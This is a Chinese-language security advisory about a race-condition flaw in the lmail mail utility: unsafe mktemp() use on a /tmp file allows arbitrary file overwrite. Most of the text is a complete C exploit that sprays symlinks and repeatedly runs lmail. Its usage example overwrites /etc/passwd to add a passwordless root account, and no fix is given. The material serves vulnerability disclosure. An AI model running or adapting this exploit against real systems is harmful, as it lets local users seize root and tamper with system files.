lmail存在竞争条件漏洞发布时间:2001-07-06 更新时间:2001-07-06 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 http://ftp.unicamp.br/pub/unix-c/mail/lmail.tar.gz详细描述 Imail使用了不安全的mktemp()函数,可以允许用户覆盖任意 文件,其中问题存在于(lmail.c)中的: #define MAIL_TMPFILE "/tmp/rmXXXXXX" ... static char tempfname[] = MAIL_TMPFILE; ... if (fseek(stdin, 0L, 0) != 0) { mailfile = fopen(mktemp(tempfname), "w+"); ... 测试代码 /* lmail-xpl.c * * Quick hack to exploit lmail * * Simply run it with the file you want to create/overwrite * and the data you wish to place in the file. * * Example: * * $ gcc -g -Wall lmail-xpl.c -o lmail-xpl * $ ./lmail-xpl /etc/passwd owned::0:0::/root:/bin/bash * * Then login as owned... etc.. * * by Charles Stevenson <core@ezlink.com> * * July 04 2001 * * shoutz b10z */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define TEMPFILE "/tmp/ez.XXXXXX" #define BRUTE 128 void usage(char*); int main(int argc, char **argv){ char tempfile[128] = TEMPFILE; int fd, i; pid_t pid; char temp[512]; if (argc < 3){ usage(argv[0]); } if((fd = mkstemp(tempfile))==-1){ fprintf(stderr, "Error creating %s!\n",tempfile); exit(1); } /* begin lazy slacker coding */ fprintf(stderr, "lmail-xpl.c by core (c) 2001\n"); fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile); /* backup old file */ sprintf(temp, "/bin/cp %s %s", argv[1], tempfile); system(temp); /* set the date/time */ sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile); system(temp); pid = getpid(); fprintf(stderr, "> creating a lot of symlinks\n"); for (i=0;i<BRUTE;i++){ sprintf(temp, "/tmp/lmail%d", pid+i); symlink(argv[1], temp); } sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s | lmail -f\n", argv[2]); fprintf(stderr, "Running a few times since I'm lazy.\n"); for (i=0;i<BRUTE;i++){ system(temp); //sleep(1); } sprintf(temp, "/bin/ls -l %s", argv[1]); system(temp); fprintf(stderr, "> cleaning up\n"); sprintf(temp, "/bin/rm -f /tmp/lmail*; /bin/rm -f /tmp/ez.*"); system(temp); fprintf(stderr, "All done. Enjoy!\n"); return 0; } void usage(char *name){ fprintf(stderr, "usage: %s <filename> <data>\n", name); exit(1); } 解决方案 尚无 相关信息 |
